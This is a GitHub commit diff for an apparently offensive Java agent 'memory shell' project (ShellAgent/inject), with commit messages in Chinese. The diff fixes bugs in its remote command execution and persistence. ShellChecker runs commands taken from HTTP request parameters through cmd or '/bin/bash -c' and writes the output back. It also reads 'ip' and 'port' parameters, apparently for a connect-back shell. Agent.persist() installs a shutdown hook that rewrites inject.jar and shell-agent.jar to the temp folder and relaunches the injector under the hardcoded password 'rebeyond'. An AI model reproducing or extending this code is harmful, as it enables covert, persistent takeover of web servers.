Skip to content

Commit

Permalink
修复linux执行命令的bug以及持久化的bug
Browse files Browse the repository at this point in the history
  • Loading branch information
@keven1z
keven1z committed Jan 20, 2022
1 parent 625bc7d commit bd08410
Show file tree
Hide file tree
Showing 7 changed files with 37 additions and 34 deletions.
9 changes: 8 additions & 1 deletion inject/dependency-reduced-pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
<modelVersion>4.0.0</modelVersion>
<groupId>org.example</groupId>
<artifactId>inject</artifactId>
<version>1.1</version>
<version>1.2</version>
<build>
<sourceDirectory>src</sourceDirectory>
<finalName>inject</finalName>
Expand All @@ -29,5 +29,12 @@
</plugin>
</plugins>
</build>
<properties>
<maven.compiler.encoding>UTF-8</maven.compiler.encoding>
<maven.compiler.target>1.8</maven.compiler.target>
<java.version>1.8</java.version>
<maven.compiler.source>1.8</maven.compiler.source>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
</project>

10 changes: 9 additions & 1 deletion inject/pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@

<groupId>org.example</groupId>
<artifactId>inject</artifactId>
<version>1.1</version>
<version>1.2</version>
<build>
<finalName>inject</finalName>
<sourceDirectory>src</sourceDirectory>
Expand All @@ -22,6 +22,7 @@
<goal>shade</goal>
</goals>
<configuration>

<transformers>
<transformer implementation="org.apache.maven.plugins.shade.resource.ManifestResourceTransformer">
<mainClass>main.java.Attach</mainClass>
Expand All @@ -42,4 +43,11 @@
<version>1.8.0_jdk8u172-b11</version>
</dependency>
</dependencies>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<maven.compiler.encoding>UTF-8</maven.compiler.encoding>
<java.version>1.8</java.version>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.target>1.8</maven.compiler.target>
</properties>
</project>
1 change: 0 additions & 1 deletion inject/src/main/java/Attach.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -45,7 +45,6 @@ public static void main(String[] args) throws IOException {
}
} catch (Exception e) {
e.printStackTrace();
System.exit(-1);
}
}

Expand Down
8 changes: 1 addition & 7 deletions memshell_asm/dependency-reduced-pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
<modelVersion>4.0.0</modelVersion>
<groupId>cn.com.x1001</groupId>
<artifactId>ShellAgent</artifactId>
<version>1.0-SNAPSHOT</version>
<version>1.2-SNAPSHOT</version>
<build>
<resources>
<resource>
Expand All @@ -28,12 +28,6 @@
</execution>
</executions>
<configuration>
<transformers>
<transformer>
<resource>META-INF/forcedelete.exe</resource>
<file>src/main/resources/forcedelete.exe</file>
</transformer>
</transformers>
<minimizeJar>true</minimizeJar>
</configuration>
</plugin>
Expand Down
6 changes: 0 additions & 6 deletions memshell_asm/pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -56,12 +56,6 @@
</execution>
</executions>
<configuration>
<transformers>
<transformer implementation="org.apache.maven.plugins.shade.resource.IncludeResourceTransformer">
<resource>META-INF/forcedelete.exe</resource>
<file>src/main/resources/forcedelete.exe</file>
</transformer>
</transformers>
<minimizeJar>true</minimizeJar>
<!-- <filters>-->
<!-- <filter>-->
Expand Down
33 changes: 18 additions & 15 deletions memshell_asm/src/main/java/cn/com/x1001/Agent.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -16,6 +16,9 @@ public class Agent {
public static InstrumentationContext context = new InstrumentationContext();
public static String currentPath;
public static String password = "rebeyond";
private final static String AGENT_NAME = "shell-agent.jar";
private final static String INJECT_NAME = "inject.jar";

public static byte[] injectFileBytes = new byte[]{}, agentFileBytes = new byte[]{};


Expand All @@ -26,8 +29,6 @@ public static void agentmain(String args, Instrumentation inst) throws IOExcepti
} else {
Agent.currentPath = args;
}
out.println("Agent password:" + Agent.password);
out.println("Agent currentPath:" + Agent.currentPath);
start(inst);
}

Expand Down Expand Up @@ -58,7 +59,7 @@ private static void start(Instrumentation inst) {
clear();
persist();
} catch (Exception e) {
// System.out.println(e);
out.println(e.getMessage());
}

}
Expand All @@ -83,14 +84,11 @@ public static void addHook() {

public static void persist() {
try {
// out.println("persist add");
Thread t = new Thread() {
public void run() {
try {
// out.println("persist start");
writeFiles("inject.jar", Agent.injectFileBytes);
writeFiles("shell-agent.jar", Agent.agentFileBytes);
// out.println("persist end");
writeFiles(INJECT_NAME, Agent.injectFileBytes);
writeFiles(AGENT_NAME, Agent.agentFileBytes);
startInject();
} catch (Exception e) {

Expand All @@ -100,15 +98,16 @@ public void run() {
t.setName("shutdown Thread");
Runtime.getRuntime().addShutdownHook(t);
} catch (Throwable t) {
out.println(t.getMessage());

}
}

private static void startInject() throws InterruptedException, IOException {
Thread.sleep(2000);
private static void startInject() throws Exception {
Thread.sleep(3000);
String tempFolder = System.getProperty("java.io.tmpdir");
String cmd = "java -jar " + tempFolder + File.separator + "inject.jar " + Agent.password;
String cmd = "java -jar " + tempFolder + File.separator + INJECT_NAME+" " + Agent.password;
Runtime.getRuntime().exec(cmd);

}

static byte[] mergeByteArray(byte[]... byteArray) {
Expand All @@ -133,13 +132,16 @@ static byte[] mergeByteArray(byte[]... byteArray) {
return result;
}

public static void main(String[] args) throws Exception {
readInjectFile("C:\\Users\\fbi\\Documents\\javaProject\\weblogic_memshell\\inject\\target");
}
public static void readInjectFile(String filePath) throws Exception {
String fileName = "inject.jar";
String fileName = INJECT_NAME;
readFile(filePath, fileName);
}

public static void readAgentFile(String filePath) throws Exception {
String fileName = "shell-agent.jar";
String fileName = AGENT_NAME;
readFile(filePath, fileName);
}

Expand All @@ -152,7 +154,8 @@ private static void readFile(String filePath, String fileName) throws Exception
byte[] bytes = new byte[1024 * 100];
int num = 0;
while ((num = is.read(bytes)) != -1) {
agentFileBytes = mergeByteArray(agentFileBytes, Arrays.copyOfRange(bytes, 0, num));
if (fileName.equals(AGENT_NAME)) agentFileBytes = mergeByteArray(agentFileBytes, Arrays.copyOfRange(bytes, 0, num));
else if (fileName.equals(INJECT_NAME)) injectFileBytes = mergeByteArray(injectFileBytes, Arrays.copyOfRange(bytes, 0, num));
}
is.close();
}
Expand Down
4 changes: 1 addition & 3 deletions memshell_asm/src/main/java/cn/com/x1001/hook/ShellChecker.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -24,12 +24,10 @@ public static void check(Object[] args, Object o) {
String cmd;
try {
cmd = execute(c);
httpResponse.write(cmd);
} catch (Exception e) {
cmd = e.getMessage();
}
httpResponse.write(cmd);

}
String ip = coyoteRequest.getParameter("ip");
String port = coyoteRequest.getParameter("port");
Expand Down Expand Up @@ -57,7 +55,7 @@ public static String execute(String cmd) throws Exception {
if (osName.contains("windows")) {
processBuilder = new ProcessBuilder("cmd", "/c", cmd);
} else {
processBuilder = new ProcessBuilder("/bin/bash", cmd);
processBuilder = new ProcessBuilder("/bin/bash","-c", cmd);
}
Process process = processBuilder.start();
in = process.getInputStream();
Expand Down

0 comments on commit bd08410

Please sign in to comment.